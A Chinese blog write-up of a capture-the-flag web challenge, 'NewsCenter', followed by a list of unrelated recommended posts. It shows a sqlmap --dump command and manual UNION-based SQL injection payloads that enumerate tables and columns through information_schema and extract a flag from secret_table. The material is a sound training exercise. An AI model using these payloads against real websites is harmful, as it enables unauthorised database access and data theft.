攻防世界之NewsCenter_行于其野的博客-程序员信息网

技术标签: wp  

题目
在这里插入图片描述
WP
在searchnew中随意输入字符串,burpsuite抓包
在这里插入图片描述
发现输入的字符串以post形式提交给了search参数
将http请求打包,用sqlmap探测search参数是否存在sql注入风险
在这里插入图片描述
注入成功
接下来直接将后台数据库直接输出

sqlmap -r searech -p search --dump

在这里插入图片描述
找到flag啦~
手动注入:
发现哪一列可以回显
在这里插入图片描述
打印数据库的表

search=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

在这里插入图片描述
查看secret_table

0' union select 1,group_concat(column_name separator ';'),3 from information_schema.columns where table_name='secret_table' --+

在这里插入图片描述

发现fl4g,查询fl4g

search=0' union select 1,group_concat(fl4g separator ';'),3 from secret_table --+

在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/109735091

智能推荐

带rmvb多个音视频文件合并,播放异常问题(thinkvd开发日志)_notton的博客-程序员信息网

<br />     在此把遇到这个问题的过程记录一下。<br />  现象:将一个rmvb视频文件及dvd iso文件视频各截一段,然后转换合并成一个新的视频,这个问题是在测试a+b=c, 然后交换合并顺序b+a=c,交换合并顺序后出现播放异常,视频速度加快,音频播放正常。于是开始了痛苦的跟踪bug过程。<br />     用的是storm播放器测试的,视频总是快,后来发现差不多快一半。rmvb是存在fps为一半的问题。用了不同rmvb文件当转换源测试也如此。<br />     这个现象中在测试许多合

java jce配置_[JAVA special] JCE三种方法让AES支持256位keySize_weixin_39745933的博客-程序员信息网

JCE是JAVA中关于加密方面的标准。来熟悉一个例子://byte[] key//byte[] iv//byte[] dataCipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");SecretKeySpec keyspec = new SecretKeySpec(key, "AES");IvParameterSpec ivspec =...

certutil: function failed: security library: bad database._想你时的孤独的博客-程序员信息网

unbuntu下导入证书出错certutil: function failed: security library: bad database.数据库损坏,重建即可。[[email protected] ~]$ mv ~/.pki/nssdb~/.pki/nssdb.corrupted[[email protected] ~]$ mkdir ~/.pki/nssdb[[email protected]

自动化运维-Ansible_星星喝可乐&的博客-程序员信息网

查看ansible-02的http端口是否存在[[email protected] ~]# systemctl status httpd● httpd.service - The Apache HTTP ServerLoaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)Active: active (running) since Tue 2021-05-25 22:29:45 CST

openstack:nova中“从镜像启动”创建虚拟机的流程_lilicheung的博客-程序员信息网

原文文章:http://blog.csdn.net/xiangpingli/article/details/47912041openstack版本为K版本。从镜像启动虚拟机之:创建镜像+创建虚拟机并开机的流程[plain] view plaincopynova.api.openstack.compute.servers.C

ELF格式文件(非常详细)_share666666的博客-程序员信息网

ELF文件研究ELF文件头程序头表节头表资源表结构

随便推点

python中font的用法_Python font.nametofont方法代码示例_weixin_39603778的博客-程序员信息网

本文整理汇总了Python中tkinter.font.nametofont方法的典型用法代码示例。如果您正苦于以下问题:Python font.nametofont方法的具体用法?Python font.nametofont怎么用?Python font.nametofont使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在模块tkinter.fon...

win7系统nginx安装配置问题_TuneG的博客-程序员信息网_nginx win7

本篇文章是自己在安装nginx过程中遇到的问题,查阅资料后,最终也成功解决了记录下来,以便于日后查阅!1.下载安装nginxhttp://nginx.org/en/download.html 下载稳定版本,以nginx/Windows-1.10.2为例,直接下载nginx-1.10.2.zip下载后解压,解压后如下2.启动nginx有很多种方法启动ngi...

【重磅上线】思维导图工具XMind:ZEN基础问题详解合集_chouhuayi4086的博客-程序员信息网

XMind是XMind Ltd公司旗下一款出色的思维导图和头脑风暴软件。黑暗的UI设计、独特的ZEN模式、丰富的风格和主题、多分支的颜色等等功能会让你的工作更加便捷与高效。在视觉感官上也会给你带来最佳的体验感。 对于初学者来说,肯定会遇到各种各样的问题,有可能对操作界面不熟,也会造成...

Tomcat配置启动成功,8080端口apache网页打不开_GOD_Dian的博客-程序员信息网_tomcat打不开8080端口

关于tomcat的配置,网上博客已经很多了,不做赘述。这里记录一下自己犯的一个小错误。背景:第二次配置tomcat,cmd输入startup出现如下窗口说明环境变量等已经配置成功但是输入http://localhost:8080/显示无法访问:解决由于第一次学习web,配置tomcat时,对端口进行过修改,于是猜测是不是tomcat的端口被改了,没有改回8080端口。(第二次配...

如何用机器学习在15分钟内破解网站验证码系统?_克金森沐沐的博客-程序员信息网

我们今天以破解世界上最流行的WordPress验证码插件为例。每个人都很讨厌验证码吧?这些烦人的小照片里有很多文本信息,只有输入它们后才能访问网站。人们设计验证码系统的初衷是为了验证访问网站的用户是一个真实的人。但随着深度学习和计算机视觉技术的进步,我们很容易就能打败这些验证码系统。(除非你遇到 12306 那种骚骚的图片识别验证,有时真的会陷入绝望)Adrian 没有访问网站生成验证码照片的工具的源代码,所以为了破解验证码,他必须下载几百个示例图像,然后手动用它们训练自己创建的机器学习系统。但如

推荐文章

热门文章

相关标签